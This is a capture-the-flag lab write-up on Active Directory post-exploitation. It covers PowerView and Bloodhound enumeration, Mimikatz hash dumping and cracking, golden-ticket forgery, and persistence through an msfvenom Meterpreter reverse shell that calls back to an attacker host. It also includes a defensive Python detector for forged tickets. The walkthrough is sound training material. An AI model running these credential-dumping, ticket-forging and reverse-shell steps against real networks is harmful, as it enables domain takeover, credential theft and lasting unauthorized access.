1. Introduction
This TryHackMe (THM) challenge covers only the basics of what is usually done after gaining access to a machine in an Active Directory (AD) network. Enumeration is done with PowerView and Bloodhound, followed by dumping password hashes and creating a golden ticket with Mimikatz. Further information gathering uses Windows Server tools and logs. Finally, a Metasploit module is used for persistence.
2. Enumeration with Powerview
Firstly, remember to connect to the TryHackMe (THM) VPN before using SSH to log in with the given IP address and credentials.
kali@kali~$ ssh Administrator@10.10.90.150
The authenticity of host '10.10.90.150 (10.10.90.150)' can't be established.
ECDSA key fingerprint is SHA256:jGGFsdyc6+usho+SGSQoG+3agPMuI+Y0SYylUJfLP8s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.90.150' (ECDSA) to the list of known hosts.
Administrator@10.10.90.150's password: P@$$W0rd
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>
PowerView is a very powerful PowerShell script from PowerShell Empire. We can use it to enumerate the domain once we have access to a machine in the network. The creator of this challenge has already placed PowerView on the remote machine for us.
Firstly, we will have to launch PowerShell with the execution policy bypassed so that we can run scripts.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator>
Next, we can start PowerView and enumerate domain users.
PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
PS C:\Users\Administrator> Get-NetUser | select cn
cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{P0W3RV13W_FTW}
sshd
We can also enumerate domain groups.
PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins
A cheatsheet for PowerView was provided to us by the creator of this challenge.
Questions and answers
What is the shared folder that is not set by default?
PS C:\Users\Administrator> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$ - Remote Admin
\\Domain-Controller.CONTROLLER.local\C$ - Default share
\\Domain-Controller.CONTROLLER.local\IPC$ - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON - Logon server share
\\Domain-Controller.CONTROLLER.local\Share -
\\Domain-Controller.CONTROLLER.local\SYSVOL - Logon server share
Answer:
Share
What operating system is running inside of the network besides Windows Server 2019?
PS C:\Users\Administrator> Get-NetComputer -fulldata | select operatingsystem
operatingsystem
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation
Answer:
Windows 10 Enterprise Evaluation
I’ve hidden a flag inside of the users, find it
Answer:
POST{P0W3RV13W_FTW}
3. Enumeration with Bloodhound
Bloodhound is a graphical user interface (GUI) tool that helps us visually map out the relationships in the network. Bloodhound comes with a collector called Sharphound which, similar to PowerView, gathers information such as users, groups, etc., and stores it in JSON files to be loaded into Bloodhound. The creator of this challenge has already placed Sharphound on the victim’s machine for us.
Installation
Install Bloodhound on your attacker machine such as Kali.
kali@kali~$ sudo apt-get update && sudo apt-get install bloodhound
Getting loot with Sharphound
First things first, we need to launch PowerShell from CMD with the execution policy bypassed. You can skip this step if you are still in the PowerShell session launched previously. Next, run the Sharphound PowerShell script.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
PS C:\Users\Administrator>
Finally, we can collect all information using Sharphound and store it in a ZIP file.
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
-----------------------------------------------
Initializing SharpHound at 1:33 AM on 1/13/2022
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL
[+] Cache File Found! Loaded 104 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 92 MB RAM
Status: 66 objects finished (+66 8)/s -- Using 97 MB RAM
Enumeration finished in 00:00:00.2933812
Compressing data to C:\Users\Administrator\20220113013345_loot.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 1:33 AM on 1/13/2022! Happy Graphing!
We can transfer the ZIP file back to our attacking machine using SCP.
kali@kali~$ scp Administrator@10.10.90.150:20220113013345_loot.zip /tmp/20220113013345_loot.zip
Administrator@10.10.90.150's password: P@$$W0rd
20220113013345_loot.zip
Map the network with Bloodhound
Firstly, we need to start neo4j, and then start Bloodhound in another terminal.
kali@kali~$ sudo neo4j console
The default credentials for neo4j are neo4j:neo4j. We need to change them at http://localhost:7474/browser/; otherwise, Bloodhound will not let us log in.

Once connected, it automatically prompts us for a new password. Change it to a password you can remember.

Launch Bloodhound.
kali@kali~$ bloodhound
You should now be able to log in using the default username and your new password.

Click the Import Graph button on the right-hand side of the Bloodhound window to import the ZIP file. If it does not work (for example, a bad .JSON file notification), drag and drop the ZIP file into the Bloodhound window.

We can now click on the menu and choose any query we are interested in.

Questions and answers
What service is also a domain admin?
Click on “Find all Domain Admins” and hover over the nodes. One of them shows the admin account to be “SQLSERVICE”.

Answer:
SQLSERVICE
What two users are Kerberoastable?
Click on “List all Kerberoastable Accounts”.

Answer:
SQLSERVICE,KRBTGT
4. Dumping hashes with mimikatz
Mimikatz is a popular tool for dumping passwords as well as for other purposes such as generating silver/golden tickets. We will touch on dumping NTLM hashes from LSA secrets, a store used by the Local Security Authority (LSA) that keeps password hashes in the registry under “HKLM:\Security\Policy\Secrets”. The creator of this challenge has already placed Mimikatz on the victim’s machine for us.
Dump hashes
Launch Mimikatz from the \Downloads folder and ensure the output of “privilege::debug” is “Privilege '20' OK”. Mimikatz must be run from an administrator shell to dump hashes from LSA secrets. When we SSH into the victim’s machine, we are in an administrator shell by default.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>cd Downloads && mimikatz.exe
  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz #
We can now dump the hashes.
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :
RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b
RID  : 00000451 (1105)
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0
RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
...
Cracking those hashes with hashcat
As the question wants us to crack Machine1’s hash, I will be cracking it instead of the example on TryHackMe (THM), which cracked Administrator’s hash.
Firstly, we have to unzip /usr/share/wordlists/rockyou.txt.gz.
kali@kali~$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz
I stored the hashes of Machine1 and Machine2 in hash.txt. Finally, we can crack the hashes.
kali@kali~$ hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
...
64f12cddaa88057e06a81b54e73b949b:Password1
Questions and answers
What is the Machine1 password?
Password1
What is the Machine2 hash?
c39f2beb3d2ec06a62cb887fb391dee0
5. Golden Ticket Attacks with mimikatz
Previously, when dumping hashes from LSA secrets, we noticed that krbtgt’s hash was among them. When a user requests a TGT, the KDC encrypts the TGT using the krbtgt account’s password hash as the secret key. Thus, having the domain’s security identifier (SID, shown next to the domain name in the lsadump output) and the NTLM hash of the krbtgt account allows us to create a custom TGT, also known as a golden ticket. A golden ticket allows us to access any machine or account in the Active Directory (AD) network.
Firstly, we need to use RDP to access the victim machine, as we will spawn another shell/CMD window after generating the golden ticket. Over SSH we would not be able to access the elevated shell later.
kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150


Dump krbtgt’s hash
Firstly, we need to launch Mimikatz from the administrator shell and check its privileges using “privilege::debug”.

C:\Users\Administrator>cd Downloads && mimikatz.exe
  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz #
We can now dump the hash of the krbtgt account.
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c
Create a golden ticket
We can actually create a ticket using any username. Only the SID, domain name and password hash must be correct: the domain SID and krbtgt’s password hash. However, I will be using the username “Administrator”. /id is set to 500, which is the RID of the built-in Administrator account, giving the ticket the highest privilege in the whole AD.
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 1/13/2022 7:15:55 PM ; 1/11/2032 7:15:55 PM ; 1/11/2032 7:15:55 PM
-> Ticket : ticket.kirbi
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
Final Ticket Saved to file !
Using the Golden Ticket to access other machines
We can now spawn an elevated shell from Mimikatz.
mimikatz # misc::cmd

By right, we could use “psexec.exe \\Desktop-1 cmd.exe” in the elevated shell. However, THM does not support multiple machines in a network, so we cannot try accessing other machines with the golden ticket.
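From the defender’s side, the ticket above is forged offline with the krbtgt key, so the KDC never logs the TGT request (Event ID 4768) that normally precedes every service ticket request (Event ID 4769) from the same account and client address. As an added example (not part of the original write-up), the check below runs that pairing over constructed 4768/4769 records; the 10-hour window is the AD default maximum TGT lifetime, and field names follow the Windows Security log.

```python
"""Flag 4769 (service ticket requested) events with no 4768 (TGT requested) for the
same account and client IP within the TGT lifetime. Sample events are constructed."""
from datetime import datetime, timedelta

MAX_TGT_AGE = timedelta(hours=10)   # AD default maximum lifetime for a user TGT

SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"time": "2022-01-13 18:02:11", "id": 4768, "user": "Machine1", "ip": "10.10.90.21"},
    {"time": "2022-01-13 18:02:12", "id": 4769, "user": "Machine1", "ip": "10.10.90.21",
     "service": "cifs/Domain-Controller"},
    # Service tickets requested for Administrator from a client that never obtained a TGT
    {"time": "2022-01-13 19:16:30", "id": 4769, "user": "Administrator", "ip": "10.10.90.150",
     "service": "cifs/Desktop-1"},
    {"time": "2022-01-13 08:00:00", "id": 4768, "user": "Admin2", "ip": "10.10.90.40"},
    # Admin2 still presenting a TGT issued 11.5 hours ago: past the default lifetime
    {"time": "2022-01-13 19:30:00", "id": 4769, "user": "Admin2", "ip": "10.10.90.40",
     "service": "ldap/Domain-Controller"},
]

def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def orphan_tgs_requests(events, max_age=MAX_TGT_AGE):
    """Return 4769 events with no 4768 for the same (user, ip) within max_age before them."""
    ordered = sorted(events, key=lambda e: parse_time(e["time"]))
    last_tgt = {}                    # (user, ip) -> time of the most recent TGT request
    orphans = []
    for e in ordered:
        key = (e["user"].lower(), e["ip"])
        t = parse_time(e["time"])
        if e["id"] == 4768:
            last_tgt[key] = t
        elif e["id"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or t - issued > max_age:
                orphans.append(e)
    return orphans

if __name__ == "__main__":
    for e in orphan_tgs_requests(SAMPLE_EVENTS):
        print(f"{e['time']} 4769 {e['user']}@{e['ip']} -> {e['service']}: "
              f"no TGT request within {MAX_TGT_AGE}")
```

Renewed tickets (Event ID 4770) legitimately outlive the window, so treat a hit as a triage lead to correlate with logon events rather than a verdict.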
6. Enumerating with Server Manager
To access Server Manager, we must RDP into the victim’s machine. As in task 5, we can use rdesktop.
kali@kali~$ rdesktop -u Administrator -d CONTROLLER 10.10.90.150

Enumeration with Server Manager
The Manage menu in Server Manager allows us to add roles and features. However, this is not really recommended, as a system administrator will notice it easily. We can ignore AD CS, AD DS, DNS, and File and Storage Services as they are not useful for post-exploitation.

Navigate to the Tools tab and select “Active Directory Users and Computers”.


Here we can see all the domain users and groups. Sometimes passwords are stored in the description field as well.
Questions and answers
What tool allows us to view the event logs?
Event Viewer
What is the SQL Service password?
MYpassword123#
7. Maintaining Access
There are many ways to maintain access on a machine. This challenge on TryHackMe uses the persistence module from Metasploit. To do that, we need a Meterpreter shell on the victim’s machine.
Generate meterpreter reverse shell
Firstly, we need to generate a Windows Meterpreter reverse TCP shell.
kali@kali~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.2 LPORT=5555 -f exe -o shell.exe
Transfer payload shell file
We need to transfer the file to the victim’s machine. We can do so using SCP since an SSH service is available. After transferring the file, we can SSH into the machine and verify that the file was transferred successfully.
kali@kali~$ scp shell.exe Administrator@10.10.90.150:shell.exe
Administrator@10.10.90.150's password: P@$$W0rd
shell.exe
kali@kali~$ ssh Administrator@10.10.90.150
Administrator@10.10.90.150's password: P@$$W0rd
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir
 Volume in drive C has no label.
 Volume Serial Number is F83F-6346
 Directory of C:\Users\Administrator
01/13/2022  08:36 PM    <DIR>          .
01/13/2022  08:36 PM    <DIR>          ..
05/13/2020  07:01 PM    <DIR>          3D Objects
05/13/2020  07:01 PM    <DIR>          Contacts
05/13/2020  07:01 PM    <DIR>          Desktop
05/14/2020  07:27 PM    <DIR>          Documents
01/13/2022  07:50 PM    <DIR>          Downloads
05/13/2020  07:01 PM    <DIR>          Favorites
05/13/2020  07:01 PM    <DIR>          Links
05/13/2020  07:01 PM    <DIR>          Music
05/13/2020  07:01 PM    <DIR>          Pictures
05/13/2020  07:01 PM    <DIR>          Saved Games
05/13/2020  07:01 PM    <DIR>          Searches
01/13/2022  08:36 PM            73,802 shell.exe
05/13/2020  07:01 PM    <DIR>          Videos
Start a listener and receive a shell
Launch Metasploit using the “msfconsole” command and use “exploit/multi/handler” to listen for an incoming reverse shell.
kali@kali~$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) >
We can now set our payload, fill in the LHOST and LPORT options, and run it. Note that LHOST is your attacking machine’s IP address.
msf6 exploit(multi/handler) > set LHOST 192.168.126.2
LHOST => 192.168.1.2
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > run
Transfer shell.exe to the victim’s machine and run it. Our Meterpreter listener should receive an incoming connection. Background the Meterpreter shell if Metasploit drops you directly into the session.
meterpreter> bg
msf6 exploit(multi/handler) >
Run the persistence module
We can now use the persistence module so that even when the machine reboots, we get a connection back and obtain a shell. Set session to the ID of our Meterpreter session on the victim’s machine. You can use the “sessions” command to list all sessions if you are unsure. Once we run the persistence module, the old session dies and a new session is spawned.
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
msf6 exploit(exploit/windows/local/persistence) > set session 1
msf6 exploit(exploit/windows/local/persistence) > run
meterpreter>
There we go, we have now obtained persistence on the victim’s machine.
I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂